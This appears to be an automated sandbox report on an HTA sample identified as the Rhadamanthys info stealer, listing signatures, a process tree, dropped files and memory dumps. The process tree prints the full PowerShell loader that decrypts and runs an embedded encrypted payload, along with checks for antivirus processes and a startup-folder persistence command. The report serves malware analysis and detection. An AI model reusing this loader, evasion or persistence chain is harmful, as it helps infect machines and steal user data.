Analysis

  • max time kernel
    136s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-02-2024 19:27

General

  • Target

    23564984.hta

  • Size

    70KB

  • MD5

    3d89cbe9713713fc038093637a602b29

  • SHA1

    cedd51d531784fd158783d94e4a003b03f838d71

  • SHA256

    187fa58d15a59f20c752a75a4cf76e3e8437da5a1d48acdb343392c692a73067

  • SHA512

    0572b10f472130d9ee6a3fd121d2e59848e123b84b5916352e42f63511521fb4cd34a12d484718045c9c421e76a9ec95cd3007ec4a4210f9e6ea3eb6c7e58fb6

  • SSDEEP

    1536:R5JC7UPpyY3TE82Fp5CVJXRP3qOm7yFeKGMzGslhYUWNQRpI2ti5Oz:R58ARIqo2tiEz

Malware Config

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3380
      • C:\Windows\SysWOW64\mshta.exe
        C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\23564984.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $dbtYVa = 'AAAAAAAAAAAAAAAAAAAAALnrWJAVpNbshv1g4GVj0ClfN9VPD7dC/pM3bBqjaycaEf4cp5diTlIvugbvt8y42JchFx6tVT9jI1sZMZSLzrr7RGwO2sBPbEGI5nJEOdSBOOtjgTkm/+epWC4AMzhpkod/AZrGrwlgrnIX+UqRSYIowz5PyVZf6aZ+5KjPOTXpZPqTmBjO/gmdeKNVMVa905zUP8GTveMekT44zJa0Z2+7A/AciXXZw375tyJ8SvaheDYED+Xcl/XXTXyN9KbqpAcyTbqdsdyTv16qcJ8Wd/xtB+ipfGE0ceL8LVpmSdrpG9AWp2jrh8LH2F2KVngatobd7P0OZLJTapuRUccOD8ZitAT5Sp7G/pSZQHu+i+jQov8utFoFAXAixN8Vl68AAnglEw08J5Jq7y+shXeDCGsFgVXtgrsJKCUwuCp9PRZoJTVQTIc3HuH/Hz88U4Zls8SEcAkHvmL/p62ZNhE/z4rbtSlngFqoZ0JDw+aN8J3wcbIKjTTjFXLJPDbX40jB6yV3N27kOC2XQ0/GXA4NBrCuANBGwFXH5X6a5jc++Nbsj9xruZ7VAUyZDt+CJtMqiJ7aZcMSQa0E+CpIDranHjga+ksujbTuXMIq+HTJ9DU/RtGmgt7E46b8yZa2TIfafM3Q4DJqd3nPcJM0R6tzRuoWiAm2kDeoeLWE8tvQXLEQEB7Fbbt712BCvcswdHdBlRoMc9ylUbNxSf2igXUP02CPYidBmehN7cWXLvzhYWFabmf3oZLjgdlK0/c4iKrTnJ+NG6TwfTuBLDOoQRVLGCXUDSdAlts87wVEWcf3J49PMd3yMf15ZUqpOUBgZm79oA==';$KPHJQieG = 'dm9lR3pSeVlLQkdIa05yYllQaVZHcmZxTmdycEVadXo=';$dMrdjZYs = New-Object 'System.Security.Cryptography.AesManaged';$dMrdjZYs.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dMrdjZYs.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dMrdjZYs.BlockSize = 128;$dMrdjZYs.KeySize = 256;$dMrdjZYs.Key = [System.Convert]::FromBase64String($KPHJQieG);$ZXoQH = [System.Convert]::FromBase64String($dbtYVa);$BAWVgYbh = $ZXoQH[0..15];$dMrdjZYs.IV = $BAWVgYbh;$bMaXsthUP = $dMrdjZYs.CreateDecryptor();$xszmlHyle = $bMaXsthUP.TransformFinalBlock($ZXoQH, 16, $ZXoQH.Length - 16);$dMrdjZYs.Dispose();$sCztlo = New-Object System.IO.MemoryStream( , $xszmlHyle );$ahEHGOk = New-Object System.IO.MemoryStream;$dlitEqjkZ = New-Object System.IO.Compression.GzipStream $sCztlo, ([IO.Compression.CompressionMode]::Decompress);$dlitEqjkZ.CopyTo( $ahEHGOk );$dlitEqjkZ.Close();$sCztlo.Close();[byte[]] $eWOmhYF = $ahEHGOk.ToArray();$QtYkBup = [System.Text.Encoding]::UTF8.GetString($eWOmhYF);$QtYkBup | powershell -
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1684
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
            4⤵
            • UAC bypass
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4780
            • C:\Users\Admin\AppData\Roaming\solaris.exe
              "C:\Users\Admin\AppData\Roaming\solaris.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2844
              • C:\Windows\SysWOW64\cmd.exe
                cmd /k move Classics Classics.bat & Classics.bat & exit
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3540
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  7⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4452
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                  7⤵
                    PID:3584
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    7⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3112
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "wrsa.exe opssvc.exe"
                    7⤵
                      PID:2292
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 26796
                      7⤵
                        PID:3596
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b Directly + Fingers + Tx + Pdf + Pattern + Avenue 26796\Blog.pif
                        7⤵
                          PID:2520
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b Mentioned + Basketball + Charitable 26796\T
                          7⤵
                            PID:4356
                          • C:\Users\Admin\AppData\Local\Temp\59875\26796\Blog.pif
                            26796\Blog.pif 26796\T
                            7⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            • Suspicious use of WriteProcessMemory
                            PID:4508
                          • C:\Windows\SysWOW64\PING.EXE
                            ping -n 5 localhost
                            7⤵
                            • Runs ping.exe
                            PID:1068
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\ByteHarbor Technologies\DataHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataHarbor.url" & exit
                  2⤵
                  • Drops startup file
                  PID:1080
                • C:\Users\Admin\AppData\Local\Temp\59875\26796\RegAsm.exe
                  C:\Users\Admin\AppData\Local\Temp\59875\26796\RegAsm.exe
                  2⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3880
              • C:\Windows\system32\sihost.exe
                sihost.exe
                1⤵
                  PID:2508
                  • C:\Windows\SysWOW64\dialer.exe
                    "C:\Windows\system32\dialer.exe"
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4936

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  ccf548cbfa9c8364e4d81c1d65f970fb

                  SHA1

                  6d510ee72a3bd6372d51a8c6e220e1d8baa9e086

                  SHA256

                  0e60116960afa99da4d6960c76c538c9ac446d7f42cea29dba576e3c8ba9bd21

                  SHA512

                  ed14feb6ddc2add39943c09559141a20f6e602c5cf8f43cf164f1aae0d85e323245be34328f8cdaf8299b61343458f929b06d1d76a4c41084c677fc93a3043c7

                • C:\Users\Admin\AppData\Local\Temp\59875\26796\Blog.pif

                  Filesize

                  924KB

                  MD5

                  848164d084384c49937f99d5b894253e

                  SHA1

                  3055ef803eeec4f175ebf120f94125717ee12444

                  SHA256

                  f58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3

                  SHA512

                  aabe1cf076f48f32542f49a92e4ca9f054b31d5a9949119991b897b9489fe775d8009896408ba49ac43ec431c87c0d385daead9dbbde7ef6309b0c97bbaf852a

                • C:\Users\Admin\AppData\Local\Temp\59875\26796\Blog.pif

                  Filesize

                  338KB

                  MD5

                  f80183d73f5ca4c8b48f0f85e631288f

                  SHA1

                  f713d12e97b597007f1b34b13341651befa8d281

                  SHA256

                  0495e68749695ad263e2b573cadcf9604614b8c61ce429acc42608039118a0c9

                  SHA512

                  da81aca0c52a35fb5b5b47569763103ccfd2c961ee32d26fbb7b8f4829a32b4dd29012b70e43f53953d80e7b53f5e3fc568ca42b3cedeada6179c124d07739e6

                • C:\Users\Admin\AppData\Local\Temp\59875\26796\RegAsm.exe

                  Filesize

                  63KB

                  MD5

                  0d5df43af2916f47d00c1573797c1a13

                  SHA1

                  230ab5559e806574d26b4c20847c368ed55483b0

                  SHA256

                  c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc

                  SHA512

                  f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

                • C:\Users\Admin\AppData\Local\Temp\59875\26796\T

                  Filesize

                  1.1MB

                  MD5

                  792fd93be2e9d6400bfefce7cbcc3826

                  SHA1

                  a2387896de18a59a82921ea16124e68370ce5c5f

                  SHA256

                  27c8c0e9213039ccf70984927172acd31dc929f56967d626e7433675d6f56623

                  SHA512

                  22bc9c81cdeede2e3a1043a42b81e0a8dc1013886c93d74550d35a90b80c3461afc6bc3741cc0e549937351a70e3f495b8434b56fc41bebbb6c8c5e521a10923

                • C:\Users\Admin\AppData\Local\Temp\59875\Avenue

                  Filesize

                  4KB

                  MD5

                  2069eaca0c1d1c2d240b2d3b77a91455

                  SHA1

                  22e8a0b6f132332a46d30e628d0134195612d114

                  SHA256

                  c3bc63097615903a384066ac7a7618e02de868abc9c8a8feea2403b9a8ae4322

                  SHA512

                  ef453c6ab8315776ab91ec9f904551d0ee878933f5e9c6565876e7566b07d44324c2f214533ed7471c3982a29a73a6a801732c3796c2874315ef52e219433da9

                • C:\Users\Admin\AppData\Local\Temp\59875\Basketball

                  Filesize

                  476KB

                  MD5

                  844c2b03ed2b11b358484ea65f798e76

                  SHA1

                  238d7f9b6545db39b2e542e3561a4bde06085c3b

                  SHA256

                  e625d9213c2b7cd35eaa4994b0dd304a14cd1ffb4a4839574d0a250a388ee30c

                  SHA512

                  d4ec17b6133c08d9bd966049513b399cdd0f7f1c2415ee4e4b11ddca48689a63958457602ec1cc2b6dabc5c59c2896fa9d0534c5ead9ff0d0513f69675a4f343

                • C:\Users\Admin\AppData\Local\Temp\59875\Charitable

                  Filesize

                  265KB

                  MD5

                  d3e8861483ea654d69e2fdc92726e48a

                  SHA1

                  1e4b3dddb7b130961ac75831117578997377f2ab

                  SHA256

                  fdba963c0b76fc75e1da7549d97e21eed56f24b1955c2f760dceca1b39216291

                  SHA512

                  b2ada80b8889e5af6ce0dab98ea1846997195e26c7f5fc78c2310acc89dd5c24591ab645ad5488d60f03a7de9f012e273e97081b74ff36cac9ad58ccccb89250

                • C:\Users\Admin\AppData\Local\Temp\59875\Classics

                  Filesize

                  11KB

                  MD5

                  f88b098d7e06201186101c6b920388c7

                  SHA1

                  fa7af2010280629ac978b0de72c8f42d109ee3f0

                  SHA256

                  dbc682be139069ba97823402d917244174bd35c0b69841b99d1cd3a5865529dc

                  SHA512

                  e4745194a21f4fe59acbfc6764971cee83a16e8451ff10a32d48ce20d6f0bfa84307dc819c8645a1191d48cebde6519a9ba4e0cbaf561d23f5b39bb55cfb7048

                • C:\Users\Admin\AppData\Local\Temp\59875\Directly

                  Filesize

                  256KB

                  MD5

                  40573224ccacb0aa66b031a46a38b3a6

                  SHA1

                  b4801575615f1576941896edaa81b84b7b8124a9

                  SHA256

                  f6bb00459a40530999a6b031550fa3981f2c8b7223193f523cb97b54a8d23339

                  SHA512

                  fe60b13e9070e364007241acf94546ce02d383c33e124cb0b9c2a14faa930956a92c0cac1117848cd6e8b0976eaf3cb3da88c6cd0a1b1262964ff64aec884a9f

                • C:\Users\Admin\AppData\Local\Temp\59875\Fingers

                  Filesize

                  230KB

                  MD5

                  88258658a598bf06dff02ad9d69c871a

                  SHA1

                  a89aa8f0cc2537074e3963f2cfbb9f866f22584d

                  SHA256

                  e452f72364d521f921aa36df8947cc66620eae4376a3520d90b1a0f81e27e547

                  SHA512

                  72c0632d6611b102713ac2df74d4b1dd44ef9ea9fb2b88e073d533c13080ccd7af1c0d994d59e9e975e0a999102d6e2c06e0bad39e08fcada9c5811f4d1800f2

                • C:\Users\Admin\AppData\Local\Temp\59875\Mentioned

                  Filesize

                  429KB

                  MD5

                  73e923577c3b5e9a3f492198198b34c3

                  SHA1

                  2e857abf355fafc6f9f13ed676fe9482084a4405

                  SHA256

                  3d093c7f529bf4d0314f01b866310658f96fd3c2f64d625d23dbad1f709f8e3d

                  SHA512

                  16e9c714dab59e09a495ff6bf6a8d5edb8611558caf328b7e53b6ced2d075de6c8b1e64f0a3b192aae8dd4ae464faf2ec258061ce3fc056b09b26b92eda46e41

                • C:\Users\Admin\AppData\Local\Temp\59875\Pattern

                  Filesize

                  200KB

                  MD5

                  6c160f6ee90ec3a3b97a8c69e3e0e1b8

                  SHA1

                  ecf68690478a785df3b08cfc6b9aaf8d36c345df

                  SHA256

                  9434f8010736e971745756e04d2a8b4e5e746a7a0044c2b5b35eadba2e23afb7

                  SHA512

                  35c03a54b28cc174f6b2ff6954ec47e7fa1eb6b7a8c9c787a36f642a7c60decbca4ef1bd47fcfd333160a6097198567f9ec65bae39f160e24f0967fe7bf822fb

                • C:\Users\Admin\AppData\Local\Temp\59875\Pdf

                  Filesize

                  127KB

                  MD5

                  c3776fd0b0dde6ae8e53c264106e2780

                  SHA1

                  2eb2350514aa2a58cdf8bb73306dc52384863dd3

                  SHA256

                  f5cc892b062fdc65a73397fc8f7bc6998ee37b9e206fbcc02e157e7fbce6f9d6

                  SHA512

                  3c37aa86aa590ab0e20130ab81fbfb67f743ff2d54e71915efb0a0ffc4b4f3a67165a066c5b5e229568274295252233ed41161d751403a9d06d1b6ce2a4444c2

                • C:\Users\Admin\AppData\Local\Temp\59875\Tx

                  Filesize

                  107KB

                  MD5

                  4caced05a0d5725cc85c1dbe44666d5f

                  SHA1

                  e5986f3c3f336adf4577ed490a791da158785657

                  SHA256

                  d07219c1214d1347a2d5b01c4abffe0ea7c67fc12f534788022da5240a993739

                  SHA512

                  c22ab9bf4b1eb9b2f8bf20bb0628d4ae46a8861d4d6f1e64cce98d7a65c41fa47f3ef297dc3596247927e9db4a4fd40b8db7ab21145663311a96ef79fd5f8410

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vaaq0u4j.mdy.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Roaming\solaris.exe

                  Filesize

                  2.4MB

                  MD5

                  ff652d08cf029b5c2ad320ecfd0bab76

                  SHA1

                  2c445cd6682cb2a3138fcf54433b61d31671547c

                  SHA256

                  0e31baeb3b4d0108735c3d0ad0cf1c7a0f7f1c40e8b36fd003312e60d4fc116f

                  SHA512

                  5bd29a3779669c2a55795d900180909d8cb0260e03d51eb98edf673ffdedc886fa79363b7c09b4979e1e8b11d0f51c2d7b141849c8e67f8f7099caae21db084d

                • memory/1684-18-0x0000000006180000-0x00000000064D4000-memory.dmp

                  Filesize

                  3.3MB

                • memory/1684-8-0x0000000005F50000-0x0000000005FB6000-memory.dmp

                  Filesize

                  408KB

                • memory/1684-62-0x0000000073D50000-0x0000000074500000-memory.dmp

                  Filesize

                  7.7MB

                • memory/1684-3-0x0000000073D50000-0x0000000074500000-memory.dmp

                  Filesize

                  7.7MB

                • memory/1684-23-0x0000000006AC0000-0x0000000006ADA000-memory.dmp

                  Filesize

                  104KB

                • memory/1684-22-0x0000000007EF0000-0x000000000856A000-memory.dmp

                  Filesize

                  6.5MB

                • memory/1684-21-0x0000000005230000-0x0000000005240000-memory.dmp

                  Filesize

                  64KB

                • memory/1684-20-0x0000000006600000-0x000000000664C000-memory.dmp

                  Filesize

                  304KB

                • memory/1684-19-0x00000000065C0000-0x00000000065DE000-memory.dmp

                  Filesize

                  120KB

                • memory/1684-2-0x0000000005240000-0x0000000005276000-memory.dmp

                  Filesize

                  216KB

                • memory/1684-7-0x0000000005EE0000-0x0000000005F46000-memory.dmp

                  Filesize

                  408KB

                • memory/1684-6-0x0000000005700000-0x0000000005722000-memory.dmp

                  Filesize

                  136KB

                • memory/1684-5-0x00000000058B0000-0x0000000005ED8000-memory.dmp

                  Filesize

                  6.2MB

                • memory/1684-4-0x0000000005230000-0x0000000005240000-memory.dmp

                  Filesize

                  64KB

                • memory/1684-80-0x0000000073D50000-0x0000000074500000-memory.dmp

                  Filesize

                  7.7MB

                • memory/2844-119-0x0000000000400000-0x000000000053B000-memory.dmp

                  Filesize

                  1.2MB

                • memory/2844-79-0x0000000002590000-0x0000000002591000-memory.dmp

                  Filesize

                  4KB

                • memory/2844-120-0x0000000000400000-0x000000000053B000-memory.dmp

                  Filesize

                  1.2MB

                • memory/3880-124-0x0000000000F80000-0x0000000000FDE000-memory.dmp

                  Filesize

                  376KB

                • memory/3880-145-0x0000000072960000-0x0000000073110000-memory.dmp

                  Filesize

                  7.7MB

                • memory/3880-142-0x00000000031D0000-0x00000000031E0000-memory.dmp

                  Filesize

                  64KB

                • memory/3880-140-0x0000000005990000-0x0000000005D90000-memory.dmp

                  Filesize

                  4.0MB

                • memory/3880-135-0x0000000076570000-0x0000000076785000-memory.dmp

                  Filesize

                  2.1MB

                • memory/3880-133-0x0000000005990000-0x0000000005D90000-memory.dmp

                  Filesize

                  4.0MB

                • memory/3880-132-0x00007FF91ADB0000-0x00007FF91AFA5000-memory.dmp

                  Filesize

                  2.0MB

                • memory/3880-131-0x0000000005990000-0x0000000005D90000-memory.dmp

                  Filesize

                  4.0MB

                • memory/3880-129-0x0000000005990000-0x0000000005D90000-memory.dmp

                  Filesize

                  4.0MB

                • memory/3880-127-0x0000000072960000-0x0000000073110000-memory.dmp

                  Filesize

                  7.7MB

                • memory/3880-128-0x00000000031D0000-0x00000000031E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4508-106-0x0000000077191000-0x00000000772B1000-memory.dmp

                  Filesize

                  1.1MB

                • memory/4508-122-0x0000000006910000-0x0000000006911000-memory.dmp

                  Filesize

                  4KB

                • memory/4780-42-0x0000000007BF0000-0x0000000007C22000-memory.dmp

                  Filesize

                  200KB

                • memory/4780-54-0x0000000007BD0000-0x0000000007BEE000-memory.dmp

                  Filesize

                  120KB

                • memory/4780-39-0x0000000007AA0000-0x0000000007B36000-memory.dmp

                  Filesize

                  600KB

                • memory/4780-38-0x0000000005010000-0x0000000005020000-memory.dmp

                  Filesize

                  64KB

                • memory/4780-41-0x0000000008BE0000-0x0000000009184000-memory.dmp

                  Filesize

                  5.6MB

                • memory/4780-37-0x00000000078B0000-0x0000000007926000-memory.dmp

                  Filesize

                  472KB

                • memory/4780-36-0x0000000006930000-0x0000000006974000-memory.dmp

                  Filesize

                  272KB

                • memory/4780-26-0x0000000005010000-0x0000000005020000-memory.dmp

                  Filesize

                  64KB

                • memory/4780-43-0x000000007F1E0000-0x000000007F1F0000-memory.dmp

                  Filesize

                  64KB

                • memory/4780-25-0x0000000005010000-0x0000000005020000-memory.dmp

                  Filesize

                  64KB

                • memory/4780-24-0x0000000073D50000-0x0000000074500000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4780-75-0x0000000073D50000-0x0000000074500000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4780-44-0x0000000070290000-0x00000000702DC000-memory.dmp

                  Filesize

                  304KB

                • memory/4780-40-0x00000000079C0000-0x00000000079E2000-memory.dmp

                  Filesize

                  136KB

                • memory/4780-55-0x0000000007C30000-0x0000000007CD3000-memory.dmp

                  Filesize

                  652KB

                • memory/4780-56-0x0000000007D30000-0x0000000007D3A000-memory.dmp

                  Filesize

                  40KB

                • memory/4780-57-0x0000000007D40000-0x0000000007D51000-memory.dmp

                  Filesize

                  68KB

                • memory/4780-58-0x0000000007D70000-0x0000000007D7E000-memory.dmp

                  Filesize

                  56KB

                • memory/4780-61-0x0000000007DC0000-0x0000000007DC8000-memory.dmp

                  Filesize

                  32KB

                • memory/4780-59-0x0000000007D90000-0x0000000007DA4000-memory.dmp

                  Filesize

                  80KB

                • memory/4780-60-0x0000000007DD0000-0x0000000007DEA000-memory.dmp

                  Filesize

                  104KB

                • memory/4936-139-0x0000000002200000-0x0000000002600000-memory.dmp

                  Filesize

                  4.0MB

                • memory/4936-141-0x0000000002200000-0x0000000002600000-memory.dmp

                  Filesize

                  4.0MB

                • memory/4936-136-0x0000000000610000-0x0000000000619000-memory.dmp

                  Filesize

                  36KB

                • memory/4936-144-0x0000000002200000-0x0000000002600000-memory.dmp

                  Filesize

                  4.0MB

                • memory/4936-147-0x0000000076570000-0x0000000076785000-memory.dmp

                  Filesize

                  2.1MB

                • memory/4936-143-0x00007FF91ADB0000-0x00007FF91AFA5000-memory.dmp

                  Filesize

                  2.0MB

                • memory/4936-148-0x0000000002200000-0x0000000002600000-memory.dmp

                  Filesize

                  4.0MB